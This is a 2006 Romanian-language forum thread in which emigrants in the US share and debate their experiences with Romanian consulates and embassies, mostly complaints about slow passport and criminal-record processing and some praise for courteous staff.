PDA

Arată versiune întreagă : Consulate romanesti. Ce parere aveti?

sorin
03.02.2006, 04:52
Avand in vedere anumite cazuri auzite in viata de zi cu zi, sau aici pe forum, va invit sa discutati pe acest topic diverse cazuri in care ati apelat la serviciile consulatelor romanesti si/sau ambasadelor Romaniei din SUA sau <st1:country-regi&#111;n w:st="&#111;n"><st1:place w:st="&#111;n">Canada</st1:place></st1:country-regi&#111;n>.
Sunteti multumiti de felul cum reprezentantii guvernului roman ne trateaza atunci cand apelam la aceste institutii pentru rezolvarea diverselor probleme? Credeti ca suntem tratati cu decenta si respect? Credeti ca reprezentantii acestor institutii fac tot posibilul sa ne ajute sa ne rezolvam problemele in cel mai scurt posibil, sau rezolvarea acestora dureaza mult mai mult decat ce ni se promite initial? In general, credeti ca aceste institutii ar trebui sa faca eforturi pentru a-si imbunatati imaginea in randurile comunitatilor pe care le reprezinta, sau credeti ca fac o treaba buna?
Daca e posibil, argumentati cu exemple concrete.

southjersey
03.02.2006, 07:06
Fragment dintr-o scrisoare primita de la Consulatul Roman dinNY in legatura cu eliberarea pasaportului:

"La data mentionata anterior va rugam sa va prezentati cu:

- numele

- inaltimea

- culoarea ochilor

[...]"

Si eu care aveam de gind sa ma prezint ca Steaua (fara nume), plat si cu ochii incolori... smileys/smiley36.gif. As fi aratat ca o amiba. smileys/smiley36.gif

dana_pascan
03.02.2006, 11:48
Povestea cazierului meu: ca sa nu mai trec prin sistemul complicat al procurilor legalizate si traduse, am decis sa merg prin Ambasada Romana din USA. precum zice web site-ul : costa $30 si dureaza 6 saptamani. Mi s-a parut decent si civilizat, caci doar suntem in USA, nu-i asa? Am trimis copii dupa actele mele si taxa la inceputul lui noiembrie. Si am asteptat.... Au venit sarbatorile si au trecut...mi-am zis ca dee....zile libere multe, se prelungeste treaba. Pana la urma, dupa 10 saptamani de asteptat am sunat la Ambasada. Mi-a raspuns o voce (imi inchipuiam deja tigara in colul gurii): "Da!" M-am blocat pentru moment, ma asteptam ceva de genul: " Buna ziua, Ambasada Romaniei, cu ce va putem ajuta?" Naivitate mare! Ma prezint si imi spun durerea. Raspunsul a sunat ceva de genul: "Draga stai linistit ca o sa primesti si cazierul". Fac referire la cele 6 saptamani cat zice web site-ul ca dureaza procedura. Raspuns: " Apoi draga, sunt 6 saptamani intre curiere, adica noi am trimis cererea ta in Romania si ar trebui sa soseasca in 6 sapatamani cu urmatorul curier si apoi noi ti-l trimitem". Raman fara replica!smileys/smiley7.gif. Azi se implinesc aproape 3 luni (12 saptamani) de cand am facut greseala sa-mi trimit actele pentru cazier. probabil ca cei de la ambasada cred ca eu am facut cerere pentru cazier, asa din plictiseala si nu ca mi-ar trebui la ceva, si deci...am timp destul sa astept pana vine curierul O DATA LA 6 SAPTAMANI. Ma intreb si eu pe unde oare vine curierul ala, caci si cu barca cu vasle ar ajunge mai repede?

Si ma mai intreb si eu asa.....daca mama merge sa-mi scoata cazierul, nu se poate fara procura , legala si parafata! Dar daca cei de la Ambasada trimit copii ale actelor mele (pe care tot eu le-am trimislor prin postasi deci nu le-a verificat nimeni daca sunt conforme cu originalul, nici macar nu au trebui legalizate), se poate elibera cazierul.

Un singur lucru ma bucura....ca salarile celor de la Ambasada Romana nu-s platite din taxele mele!

roxana petre
05.02.2006, 13:38
Am facut cerere de pasaport in luna mai, si am mers in Romania ca
sa ridic pasaportul acolo cit stau in tara. Pentru $80 imi inchipiam ca
am sa i-l am gata cum ajung acolo... 2 zile la coada, ca la
pasapoarte in Bucuresti... nu mi l-au gasit, si sustineau ca nu a fost
trimis... asta era Sepembrie, deci 4 luni mai tarziu. Acum este
Februarie si nu am auzit de situatia pasaportului meu, sau dosarul...
Nici nu stiu daca mai vreau sa am pasaport Roman...

GNChicago
05.02.2006, 14:15
Oameni buni va e frica sa mentionati locul ambasadelor mentionate?????

Sau va e frica????

Avem de-aface cu fricosi pe acest forum????

SPEAK OUT!!! SPEAK OUT NOW!!!!

VORBESTE! VORBESTE ACUM!!!

Or Keep quiet and Do not Complain!

Ori TACI si NU TE PLINGE!

angeline
06.02.2006, 00:30
http://photobucket.com/albums/v235/SmileyMags/SmEMOT/th_ohnoo.gifpe mine una....masurprinzi GNChicago !

06.02.2006, 02:12
Sorin, la choices nu ai pus si "foarte proasta," ca sa pot sa votez si eusmileys/smiley2.gif

sorin
06.02.2006, 02:24
Mugatu, mi-a scapat acest detaliu si drept sa-ti spun nu-mi imaginam ca o sa fie nevoie si de acea optiune.smileys/smiley9.gif Acum este prea tarziu, pentru ca nu se mai poate schimba. Poti totusi sa alegi optiunea cea mai apropiata de adevar si cu comentariile de rigoare. smileys/smiley2.gif

Asa cum spunea si GNC, ar fi bine sa si precizati despre ce consulate este vorba in comentariile voastre.

Pisoi
06.02.2006, 07:58
Eu personal nu am avut nevoie de serviciile consulatului roman, ci doar pentru membrii familiei, chiar si pentru cei veniti in vizitasmileys/smiley4.gif si pot sa spun ca am fost placut surprinsde amabilitatea si profesionalizmul cu care sunt tratati toti romanii si chiar americani nativi.smileys/smiley32.gif De fiecare data am urmarit cu atentie conversatiile celor in cauza siam numai cuvinte delaudapentru felul in care fiecare individ/caz este tratat de personalul consularin incercarea lorde a rezolva problemele fiecaruiasmileys/smiley20.gif...trebuie insa, sa luam in consideratie, si sa intelegem ca serviciile consulare sunt bazate pe legile in vigoare ale romanieismileys/smiley21.gifci nu a celor americanesmileys/smiley2.gifiar angajatii consulari romani trebuie sa le aplice asa cum suntsmileys/smiley19.gif

Felicitari D-lui Consul Ghenea sipersonalului consulatului din LAsmileys/smiley32.gif

roxana petre
06.02.2006, 14:06
Nu inteleg iesirea asta grosiera a GNChicago... trebuie sa-i amintim
domnului ca acest forum este civilizat si un ton respectuos ar fi de
preferat.

GNChicago
06.02.2006, 17:07
Roxana, sa sti ca m-a suparat faptul ca sunt oameni care se vaita dar nu fac nimic pentru a schimba situatia. Vorbesc si nu dau exemple concrete cu experientele avute.

O tratare deschisa a problemei ar ajuta pe toata lumea.

In ceea ce priveste consulatul din Chicago, personal nu am avut probleme ci din contra atitudinea membrilor de la consulat m-a impresionat pozitiv, si nu se poate compara cu atitudinea consulatelor din perioada ceausista.

Am spus-o de mai multe ori ca Romania ar face mari pasi inainte daca toti romanii ar fi mai exigenti cu alesii lor, nu s-ar lasa cumparati cu doi mici si o bere.... nu ar mai admite coruptia, nu ar mai da shpaga nicaieri ptr lucruri ptr care unii sunt platiti sa le faca fara shpaga

Nu ti se pare normal ca cei care au scris negativ despre personalul ambasadei sa viina cu nume, locuri unde s-a intimplat, astfel ca aceasta descriere negativa sa nu fie asociata cu consulatele unde oamenii fac totul ca treaba sa mearga bine????

roxana petre
06.02.2006, 17:57
din cite am inteles eu intrebarea initiala nu a fost pusa ca o ancheta,
ci ca un poll de opinii...cu toate ca nu stiu cine si ce putere de
influenta are si asupra cui. Daca intrebarea a fost cu o anumita
intentie, ar fi trebuit descrisa initial. In cazul ca Sorin face eforturi de
a imbunatatii serviciile ambasadei/consulatului este imbucurator,
dar el ar fi trebuit sa descrie intentia pentru ca participantii
forumului sa aleaga daca vor sau nu sa dezvaluiasca nume si locuri.

Cred ca tu ai luat intrebarea lui one step forward si din cauza asta
te-ai revoltat. Dar din nou, parerea mea, intrebarea nu a fost pusa
cu intentie de ancheta.

sorin
07.02.2006, 00:19
Dezvaluirea de exemple concrete este optionala bineinteles, iar parerea mea este ca GNChicago a sugerat forumistilor sa aiba mai mult curaj si sa spuna la ce consulate au avut experiente neplacute. Tacerea nu e de aur totdeauna si daca cei care au trecut prin experiente negatve nu au curajul sa spuna (chiar sub pavaza anonimatului), sansele de a se indrepta ceva sunt mult mai reduse.

GNChicago
07.02.2006, 03:21
Roxana a scris:

"Cred ca tu ai luat intrebarea lui one step forward si din cauza asta te-ai revoltat. Dar din nou, parerea mea, intrebarea nu a fost pusa cu intentie de ancheta. "

Roxana, desigur esti libera sa crezi si sa ai parerile tale, dar ele nu coincid cu ce am spus eu in primul mesaj.

Nu am votat in niciun fel din respect pentru cei care sunt nemultumiti, deasemenea din respect pentru cei care sunt multumiti.

Personal, m-am suparat cind o persoana pe acest forum ne spune despre experienta sa negativa cu un anume consulat din lumea larga dar nu ne spune locul acelui consulat, pentru a da posibilitatea acelui consulat sa se schimbe ori sa fie analizat si de alti forumisti. Asta nu inseamna ca cel care a scris are dreptate sau nu are si ar fi dat posibilitatea si altor forumisti sa-si expuna parerile.

O parere negativa despre consulateexprimata la modul general poate sa fie asociata cu oricare din consulatele lumii si asta mi sa pare a fi nedrept.

O sa-ti dau un singur exemplu cu cel a-lfostului consul din Chicago, care practic a fost cel care a deschis acest consulat aici.

In primele zile de la deschidere, omul a fost pe la toate bisericile romanesti din Chicago, impreuna cu toata echipa si s-a prezentat sine-a spus ca doreste sa ne ajute si ne-a descris misiunea lui aici.

Problemele lui personale au facutsa se indrepte spre alte oportunitati profesionale si la foarte multi le-a parut rau ca l-am pierdut, dar totodata ne-am bucurat pentru el aflind ca are succes in ceea ce intreprinde, deasemenea ne-am bucurat sa-l mai vedem din cind in cind la televizor (TVR-i).

Nu crezi ca e pacat ca acea umbra negativa descrisa in general de un forumist mai sus sa cada si asupra acestui om?

Nu as vrea sa inchei inainte de a mentiona ca de vreo doi ani avem un nou consul in Chicago, dar personal am fost extrem de ocupat si nu am avut niciun fel de interferente cu noul consul.

Revin cu aceeasi intrebare, nu credeti ca ar fi bine ca cei care vorbesc sa puna si subiect si predicat, fara sa arunce doar asa vorbe fara acoperire pe net? Nu credeti ca o asemenea discutie deschisa cu exemple concrete ar ajuta ca situatiile negative expuse sa fie corectate?

roxana petre
07.02.2006, 06:25
Sint sigura ca forumistii nu ar avea de obiectat in a mentiona date
concrete. Chiar si eu nu am fost exacta pentru ca directiile poll-ului
nu au indicat "precizati nume si loc". In situatia mea a fost Los
Angeles.
Trebuie sa apreciem eforturile oamenilor care au participat
dezvaluindu-si numultumoirile. Sint sigura ca ei au facut-o cu
intentia si speranta de imbunatatire a serviciilor. Acum Sorin te
intreb eu cu ce poti tu schimba situatiile negative de mai sus? Este
acest poll doar o curiozitate, si daca este asa nu are rost sa analizam
prea mult; daca ai un scop te rog sa ne spui cum poti schimba
situatia care este in mare parte negativa. Doar spune-ne daca ai un
plan, nu da amanunte, dar cred ca daca ai un plan ar incuraja alti
forumisti sa participe si de data asta detaliat si poate te putem ajuta
si impreuna sa facem imbunatatiri.

sorin
07.02.2006, 06:52
In orice domeniu, cu cat sunt mai multe voci care doresc schimbare, cu atat sunt mai mari sansele de reusita. Nu as putea spune ca am avut vreun plan cand am deschis acest sondaj, dar m-am gandit la posibilitatea ca atunci cand vor fi destule voturi si comentarii, sa trimit un link (oricine altcineva o poate face deasemeni) la toate consulatele romanesti, pentru ca cei ce sunt pusi acolo sa ne reprezinte, sa afle care este parerea generala a unei mici parti a romanilor din America de Nord care au citit sau participat la acest sondaj, avand astfel motive ori sa se bucure de faptul ca fac treaba buna, ori sa se ingrijoreze de opinia generala si sa ia masuri.
Important este ca voturile si comentariile voastre sa fie sincere, iar daca este posibil, exemplele concrete ar ajuta, pentru a nu exista interpretari confuze. Oricare dintre noi facem greseli mai multe sau mai putine, dar este posibil sa nu ne dam seama de aceste greseli daca nu ni le aduce cineva la cunostinta si asta se poate intampla oricui, nu numai consulatelor romanesti.

evelyn
07.02.2006, 07:22
Buna treaba Sorin !!!

Eu personal apreciez treaba aceasta, iar ceea ce ai de gand sa faci cu acest sondaj este o buna ideea.....chiar daca ar putea ajuta doar unei singure locatii/persoane ,sau ar pune pe ganduri pe cineva........este totusiun lucru pozitiv.

Nice jobsmileys/smiley2.gif...

angeline
07.02.2006, 07:40
eu am afirmat faptul ca ma surprinzi GNC, pentru ca intradevarma surprinde placut atitudinea ta.....foarte adevarat cu murmuratul nu sevor indreptataniciodata problemele....pentru a interveni in schimbarea situatie, trebuie atitudine si date concrete...ramane o intrebare...cine poate intradevar vocifera ?

ma gandesc ca cetatenii americani de origine romana, nu au nimic de pierdut....pe cand cei de pe cealalta a baricadei risca mult....

totusi consider ca este nevoie de atitudine !

Pisoi
07.02.2006, 07:41
roxana petre, se pare ca tu analizezi in profunzime situatia ta, ci nu subiectul topicului deschis de sorin. Citeste primul lui post.

"Sunteti multumiti de felul cum reprezentantii guvernului roman ne trateaza atunci cand apelam la aceste institutii pentru rezolvarea diverselor probleme? Credeti ca suntem tratati cu decenta si respect? Credeti ca reprezentantii acestor institutii fac tot posibilul sa ne ajute sa ne rezolvam problemele in cel mai scurt posibil, sau rezolvarea acestora dureaza mult mai mult decat ce ni se promite initial?"

Dupa cum inteleg eu subiectul se refera la cum suntem tratati de angajatii consulari si eforturile lor in a ne rezolva problemele, ci nu de birocratia si legile romane la care acesti angajati nu au juristrictie. Cred ca nemultumirea ta se refera la perioada lunga si nejustificata a primirii noului pasaport, care practic depinde tot de sectia de pasapoarte din romania. Cei de la consulat spun de la inceput ca dureaza peste 4 luni pentru ca asa sunt informati sa spuna. Ce crezi tu ca ar trebuii sa faca cosulatul?

Spui ca ai fost la consulatul din LA si ai stat la coada 2 zile, cel putin asa se intelege. Eu de cate ori am fost la acel consulat nu am vazut mai mult de 4-5 persoane, sau nu vorbim de aceeasi locatie? Consulatul poate fi contactat si la telefon sau chiar prin email, nu neaparat sa stai la coada. Eu de cate ori i-am contactat prin email am primit raspuns in cel mult 2 zile.

Pe de alta parte, GNCnu cred ca se referea specific lapostul tau si nu cred ca intentia lui (si nici a lui sorin sau a altcuiva) este de a ancheta pe cineva sau cazurile lor, ci doar de a ne expune opiniile si/sau comentariile si sa vedem daca si cum se poate imbunatati cevain serviciile consulatelor.

Sfatul meu, fi putin mai deschisa si nu lua personal raspunsurile forumistilor, altfel riscam cu totii sa aberam la contradictii. ...iar GNC se supara si mai rau si mai trage o cana de visinatasmileys/smiley36.gif

Succes, si te asteptam cu comentarii.

Pisoi
07.02.2006, 07:59
angeline, ai dreptatesmileys/smiley32.gifasta e si scopul, ca cei de aici (si in special cei veniti de mult) sa ia atitudine si sa vocifereze, poate mai mult in favoarea celor noi veniti dar si celor de pe cealalta parte a baricadei.smileys/smiley4.gif

un singur lucru de mentionat, poate putem sa schimbam serviciile si atitudinile de aicismileys/smiley2.gif...legile sau directivele cred ca cei de pe partea cealalta a baricadei au mai multa sanse de schimbarismileys/smiley4.gif...si vociferarea celor de aici poate sa influenteze pozitivsmileys/smiley2.gif

roxana petre
07.02.2006, 08:25
:S... Pisoi, tu ai citit opinia mea initiala si ai inteles ca am stat 2 zile
la coada in LA?
Revolta mea este ca 9 luni mai tirziu (din mai pina in februarie)
consulatul nu m-a contactat nici nu mi-a trimis pasaportul prin
posta cum este normal. Dosarul meu a fost trimis la Bucuresti unde
eu am incercat sa ridic pasaportul in Septembrie, in perioada
vacantei mele in Romania, dar nu am reusit. Daca pasaportul meu se
intorcea la consulatul din LA cind a fost gata, unde este pasaportul
meu? Sper ca de data asta am clarificat cazul meu.
Am fost asa de dezamagita cu procesul asta pentru un simplu act ca
cu toate ca locuiesc vizavi de consulat nu vreau sa trec din nou prin
birocratie, cereri, audiente, etc. Am sa calatoresc cu pasaportul meu
american.

GNChicago
07.02.2006, 08:33
Parerea mea este cel putin pentru cei din America care au visat Statuia Libertatii, au venit degeaba aici daca accepta orice fel de nelegiuire din ori ce parte ar veni ea.

Traiti in PATRIA LIBERTATII si pentru unii e pacat ca nu profitati din plin de acest loc. trebuie sa vorbiti liber de orice prejudecati. Daca va uitati la mesajele mele anterioare, nu au scapat nementionati nici Nixon, Clinton, Bush, Reagan ori Iliescu, Constantinescu, Nastase, Basescu, sau chiar alti forumisti....

Recent am reusit sa vorbesc la telefon cu prorectorul de la ASE si cu ministrul invatamintului in scopul de a sustine acesti absolventi de la Institutiile de invatamint din Romania in cooperarea lor cu cele din America. De fapt despre ce e vorba.....Universitatile Americane pentru a evita frauda cer ca diplomele (copii fidele) si corespondenta despre absolventii din Romania sa fie trimisa direct de la Univ. din Romania la cea din America. Sunt foarte multi studenti pe aici pe la cele mai renumite Univ. care trebuie sa ia niste cursuri din nou ptrca Univ. din romania nu coopereaza si acest lucru trebuie corectat de urgenta.

Nu vreau sa ies din topicul lui sorin, dar e timpul ca romanul sa inceapa sa vorbeasca cu subiect si predicat si sa dea amanuntele necesare ca o situatie negativa sa se indrepte, deasemenea cei in cauza sa stie ca nu vor fi iertati si vor fi expusi public.

Inca o precizare, sa nu uitati ca atunci cind sunteti intr-o ambasada, va aflati pe teritoriul romaniei si cei de acolo sunt nevoiti sa respecte legile Tzarii lor asa cum sunt bune sau rele.

Pisoi
07.02.2006, 09:19
roxana, cred ca asa trebuiaexplicat de la inceput, astfel se evitau confuziilesmileys/smiley5.gif...impart cu tine dezamagirea si revolta tasmileys/smiley4.gif...mama mea este intr-o situatie asemanatoare, dar nu disperam, n-au trecut mai mult de 4 luni.smileys/smiley9.gif ...am sa ma interesez, si printre altele am sa fac si o intrebare referitor la cazul tau(doar ca exemplu) fara nume sau alte detalii, in speranta ca ei imi pot da o explicatie.smileys/smiley1.gif

...un lucru e clar, sistemul de eliberare al pasapoartelor in romania nu se compara nici pe departe cu cel al nici uneia din alta tari. ...ex. daca un american pierde pasaportul in romania, dupa cate stiuii este eliberat altul in 2-3 zile chiar la ambasadasmileys/smiley32.gif...fi bucuroasa ca si mine ca detinem un astfel de pasaportsmileys/smiley4.gif...personal nu am cetatenia romana, la ce mi-ar mai folosi pasaportul...smileys/smiley36.gif

sorin
07.02.2006, 09:41
roxana, cred ca asa trebuiaexplicat de la inceput, astfel se evitau confuziilesmileys/smiley5.gif...impart cu tine dezamagirea si revolta tasmileys/smiley4.gif...mama mea este intr-o situatie asemanatoare, dar nu disperam, n-au trecut mai mult de 4 luni.smileys/smiley9.gif ...
Deci cu cine votezi pana la urma Pisoi? smileys/smiley92.gifImparti dezamagirea, mama ta este intr-o situatie asemanatoare, dar totusi ai votat la

Pisoi
07.02.2006, 10:01
sorine, votul meu "foarte buna" este bazat pe felul cum am fost tratati si serviti la consulat, incluzand si tratarea celor pe care i-am intalnit acolo de fiecare data.personalul consular si consulul sunt foare politicosi, amabili si expliciti in informatii.smileys/smiley4.gif

..."impart dezamagirea cu roxana" am vrut sa spun ca acum ii inteleg supararea si revolta. (cred ca m-am exprimat gresit)smileys/smiley9.gif...dar cazul ei depinde mai mult de centrul de pasapoartesmileys/smiley7.gif...mama asteapta pasaportul roman, cu toate ca nu are nevoie, si atunci de ce sa disperamsmileys/smiley36.gif

dana_pascan
08.02.2006, 03:38
Salut tuturor...scuze ca am disparut in ceata.. din motive de sanatate!

GNC....motivul pentru care nu am precizat despre ce consulat romanesc e ca amuitat! Nici intr-un caz ca mi-ar fi frica! No way!

E vorba de cel de la Washington, vrei si adresa?

Inca nu am primit cazierul cu pricina...astept. Problema mea nu e cu legile din romania, ca doar de aia am plecat de acolo...ca sa scap de ele. Problema mea e cu atitudinea celor de aici. Banuiesc ca informatiile de pe site-ul consulatului romanesc din washington sunt "provide" (nu mai stie vorbeste romaneste!...dar pot sa dau vina pe pain-killers pentru astasmileys/smiley69.gif) de cei de aici si nu de cei din Romania. De ce nu spun 3-4 luni in loc de 6 sapatamani cat pretind ei ca dureaza eliberarea cazierului?

Pe de alta parte, am avut de a face cu inca doua consulate romanesti Spania si Franta, dar asta acum vreo 6-7 ani. Nu m-au impresionat deloc, dimpotriva! In Spania m-au tratat ca pe ultimul borfas (desi chiar nu au avut motive), si la vremea aia inca mai plateam taxe in Romania!

Poate ca or fi si oameni de treaba dar eu n-am dat inca peste ei, nimeni care sa se arate dispus sa faca "one extra step" ca sa ma ajute. Dimpotriva....Daca se gandeste cineva sa faca o scrisoare de plangere despre servicile consulatului romanesc de la Washington, sunt si eu prezenta cu semnatura!

dana_pascan
09.02.2006, 06:23
Si inca un mic comentariu....ca tot veni vorba de frica....suntem tare putini pe forumul asta care folosim ca si "user name", numele nostru real!

GNChicago
09.02.2006, 16:08
Dana, faptul ca ai uitat sa mentionezi locul e un motiv foarte bun, se intimpla si la case mai mari.

User name si / sau numele real a fost o optiune data de la inceput de acest forum si nu am banuit ca voi fi involvat asa de mult cu acest forum.....dar e adictiv. Astea au fost regulile jocului!

Asteptam corectii sau comentarii de la Washington DC.....

Totdeauna cind vorbesc cu US Gov. la telefon, primul lucru ma prezint eu si pe urma intreb cu cine vorbesc si daca e nevoie il pun sa "spell" the name......Toti ar trebui sa faca asta si sa iasa din acel complex de inferioritate...

adrian ionescu
12.02.2006, 20:36
Eu am apelat la serviciile consulatului din Los Angeles, pentru reinnoirea pasaportului. Am vorbit la telefoncu o functionara de acolo, care a fost politicoasa si a explicat foarte clar ce avem de facut. Ce nu imi convine este timpul mare de asteptare pina la sosirea noilor pasapoarte.

dana_pascan
13.02.2006, 10:10
Norocosule.....

Stiati ca la Consulatul din Washington curierul din tara vine doar o data pe luna? Sunt sigura ca trec oceanul inot caci altfel nu-mi explic.

Azi implinesc 3 luni decand mi-am depus cererea de cazier la ei, dupa matematica mea 12 saptamani,de 2 ori perioada de asteptare pe care o zic cei de la consulat;si se pare ca mai am de asteptat pana in 25 Februarie cand va sosi curierul din nou. ...asta daca am noroc, daca nu...lasa ca si in Martie sau in Aprilie e bine....ca vorba aia: sunt tanara si am mult pana la pensie. Ma gandesc sa scriu o scrisoare Cosulului!smileys/smiley7.gifMai e cineva interesat sa-si puna semnatura?

14.02.2006, 03:19
[QUOTE=dana_pascan]

Stiati ca la Consulatul din Washington curierul din tara vine doar o
data pe luna? Sunt sigura ca trec oceanul inot caci altfel nu-mi explic.

Dana, de cand nu mai zboara Taromul la New York , curierul vine doar
1 data pe luna. Cei de la Washington se duc si-l ridica de la New York.

< =""> <!--
var SymReal&#079;nLoad;
var SymReal;

Sym()
{
window.open = SymWinOpen;
if(SymReal != null)
SymReal();
}

Sym&#079;nLoad()
{
if(SymReal&#079;nLoad != null)
SymReal&#079;nLoad();
window.open = SymRealWinOpen;
SymReal = window.;
window. = Sym;
}

SymReal&#079;nLoad = window.&#111;nload;
window.&#111;nload = Sym&#079;nLoad;

//-->
</>

14.02.2006, 03:25
In urma cu3-4 ani am avut idea geniala sa intreb la Ambasada Romanadin DC cum sa facsa-mi re-inoiesc pasaportul (a expirat in 1986smileys/smiley36.gif) La telefon nu a raspuns nimeni, nici voicemail nu aveau sa las un mesaj, asa ca am trimes cateva emails la adresele pe care le-am gasit pe websitu lor. Inca nu am primit raspuns, da eu mai astept ca nu ma grabesc si ei poate sunt ocupati....smileys/smiley36.gif

dana_pascan
14.02.2006, 04:57
Esrin, eu incerc sa le inteleg pe toate.....dar oare si Consulatul USA din Bucuresti primeste corespondenta o data pe luna? Hai sa fim seriosi, suntem in anul 2006 daca nu ma insel smileys/smiley1.gif, cand viteza comunicarii si a transportuluie la indemana tuturor.Totusi evorba de Consulatul de la Washington....ma intreb oare la cat timp vine curierul la alte consulatele din Papua-Noua Guinee sau in Trinidad -Tobago? Nu m-as mira sa aflu ca vine saptamanal! Banuiesc ca e vorba de banii, costa mai mult acum de cand cu Taromul....nu vi se pare ridicol ca e face economie la astfel de servicii, cand in tara...stim cu totii ce se intampla...http://www.romanian-portal.com/forum/smileys/smiley7.gif

Mugatu...la ce atata graba? Doar esti tanar si mai ai pana la pensie! Se pare ca nu o sa mai pupi pasaport romanesc valid si imi inchipui ca tare esti necajit din cauza asta.smileys/smiley2.gif

dana_pascan
14.02.2006, 05:06
Tocmai am intrat pe site-ul Consulatului ca sa printez pagina de rigoare care zice 6 saptamani pt obtinerea cazierului caci vroiam sa o atasez la scrisoarea catre Consul...Surpriza! http://www.roembus.org/

S-a modificat schimbarea, acum zice 120 zile, ceea ce pare corect. Intr-un fel imi pare rau ca nu m-am trezit mai repede sa trimit scrisoarea pentru consul, pe de alta parte ma bucur ca s-a trezit cineva sa faca un update la site. Si totusi ...la mine eu trecut 120 de zile! smileys/smiley7.gifPoate mai fac un update in curand la 150 zile...smileys/smiley19.gif

sorin
14.02.2006, 05:28
Eu nu am avut niciodata nevoie de rezolvat acte prin consulate, dar pot sa spun ca am trimis cateva emailuri pe vremuri la ambasada, la Washington D.C., rugandu-i sa adauge Romanian-Portal.com pe lista lor de comunitati romanest de pe siteul lori, rezultatul fiind ca <B style="mso-bidi-font-weight: normal">niciodata nu am primit vreun raspuns[/B] in acest sens si nici siteul nu a fost adaugat.smileys/smiley18.gif

Faza haioasa a fost cand postasera un mesaj despre un eveniment culinar si in loc de

14.02.2006, 06:41
Mugatu...la ce atata graba? Doar esti tanar si mai ai pana la pensie! Se pare ca nu o sa mai pupi pasaport romanesc valid si imi inchipui ca tare esti necajit din cauza asta.smileys/smiley2.gif

Asta este si frica mea......cate nopti am pierdut eu din cauza asta...smileys/smiley36.gif

Pe timpuri, unprieten mi-a spus ca daca te duci in Romania este mai bine sa arati pasaportul Romanesc dacat cel American, nu imi amintesc exact care ar fi fost motivul. De aceia am facut o incercare timida de a mi scoate pasaport romanesc. Intre timp m-am vindecat si de pasaport si de vizita....smileys/smiley36.gif

15.02.2006, 07:16
Se vede Dana si Mugatu ca ganditi foarte rational si cu bun simt.

Ar fi bine sa gandeasca si personalul ambasadei sau consulatelor la
fel.Din pacate vechea mentalitate"merge si asa" e foarte prezenta.

Pt Sorin:

Ambasadorul stie dar nu are nici timp nici chef sa traga la raspundere
pe nimeni(doar daca e vreun scandal se intervine).Functionarii sunt si
ei doar niste functionari publici, nu se deosebesc de cei americani
daca e sa fim drepti.

Oricum dinaintru(ambasadei) lucrurile se vad altfel.

< =""><!--
var SymReal&#079;nLoad;
var SymReal;

Sym()
{
window.open = SymWinOpen;
if(SymReal != null)
SymReal();
}

Sym&#079;nLoad()
{
if(SymReal&#079;nLoad != null)
SymReal&#079;nLoad();
window.open = SymRealWinOpen;
SymReal = window.;
window. = Sym;
}

SymReal&#079;nLoad = window.&#111;nload;
window.&#111;nload = Sym&#079;nLoad;

//-->
</>

leu_mihaisorin
21.02.2006, 09:51
Salutare! Numele meu este Mihai si locuiesc inca in Romania. Ma sperie dar nu ma surprinde ideea generala care se desprinde din topicul asta : institutiile romane nu se respecta (ele insele!) nicaieri in lume. smileys/smiley5.gifPoate mai aveti rude in Romania sau v-ati lovit chiar voi de birocratia si stupiditatea majoritatii institutiilor de aici, deci intelegeti ce vreau sa spun. Nu ma asteptam insa ca, oriunde in lume as spune, nu in USA, un consulat sau o ambasada romana sa se comporte cum am citit mai sus. Sunt mandru ca sunt roman, dar ma intreb daca vom putea vreodata sa ne mandrim cu institutiile si serviciile din Romania...

21.02.2006, 10:25
Mihai, de esti surprins? Nu tot romani sunt si functionari de la
ambasade sau consulate? Atunci de ce te miri? Tot aceiasi birocratie si
lipsa de respect pentru public ca si in Romania, numai ca acum in
deplasaresmileys/smiley36.gif

sorin
01.03.2006, 03:56
S-ar parea ca votarea decurge intr-o nota de nemultumire generala. Ar fi bine daca am mai auzi si diverse cazuri de la cei care au apelat la serviciile consulatelor romanesti pentru diverse probleme si felul in care aceastea le-au fost rezolvate. Poate vor vedea/auzi si cei care trebuie si isi vor imbunatati imaginea in viitor.
Nu ezitati sa spuneti ce aveti de spus. Tacerea nu este de aur intotdeauna.smileys/smiley2.gif

01.03.2006, 05:44
Eu locuiesc in zona ambasadei de la Washington. Nu am avut nici un fel de probleme cu ambasada...chiar mi s-a parut o atitudine americana a functionarilor...desi era de asteptat sa fie una romaneasca. Eu cred ca ei doresc sa ii copieze pe americani in ceace priveste serviciile...e adevarat ca mai trebuie sa si reuseasca dar important e ca incearca. smileys/smiley1.gif

Pisoi
01.03.2006, 09:03
...surprize, surprizesmileys/smiley4.gifam primit un mesaj telefonic de la personalul Consulatului din LA ca pasaportul mamei a fost primit la sediusmileys/smiley2.gifdeci!!!... eu imi sustin idea ca suntem serviti asa cum trebuie de membrii consulari romanismileys/smiley32.giflegile si procedurile romanesti trebuiesc schimbatesmileys/smiley7.gif...dar si atitudinea noastrasmileys/smiley9.gif

nkog
01.03.2006, 10:16
eu imi sustin idea ca suntem serviti asa cum trebuie de membrii consulari romanismileys/smiley32.giflegile si procedurile romanesti trebuiesc schimbatesmileys/smiley7.gif...dar si atitudinea noastrasmileys/smiley9.gif

Poate citesc si ei pe forum...nu se stie niciodata...smileys/smiley1.gif. Feed-back in toata regula...si pentru unii si pentru altii.

02.03.2006, 00:17
Pisoi, ma bucur ca situatia ta a fost rezolvata favorabil, insa sti tu vorba veche, cu o floare nu se face primavara. Legile, asa idioate cum sunt ele, nu au nici o legatura cu idiferenta, aroganta si lipsa de respect pe care multi romani o intalnesc cand au nevoie de ambasada sau consulatul roman!

nkog, tu crezi ca ei nu stiu cat de incapabili sunt? Sunt convins ca primesc ei feedback zilnic de "happy customers"smileys/smiley36.gif

sorin
02.03.2006, 01:31
Pisoi, s-ar parea ca tu te numeri printre norocosi in ceea ce priveste consulatul din LA. Iata aici un citat de pe grupul de discutii yahoo

radudulau
06.03.2006, 11:59
vreau sa spun ca am trimis e-mailuri in repetate randuri la ambasada romana de la DC si la consulat la LA. ei , asta a fost in luna mai a lui 2005.. si nu a fost doar un e-mail..ci mai multe..sau cand am sunat 8din 10 nu a raspuns nimeni si cand a raspuns cineva mi-a spus sa astept..si dupa ce mi sa urat de stat la telefon, sa inrerupt.

pe de alta parte acu cativa ani , fiind inca in tara am scris un mail la ambasada americana ref la o problema pe care o avea mama prietenei mele, siDl. consul mi-a raspuns , si la scurt timp ma si sunat sa imi zica despre e-mail, si sa ma intrebe daca poate sa ma ajute cu altceva.

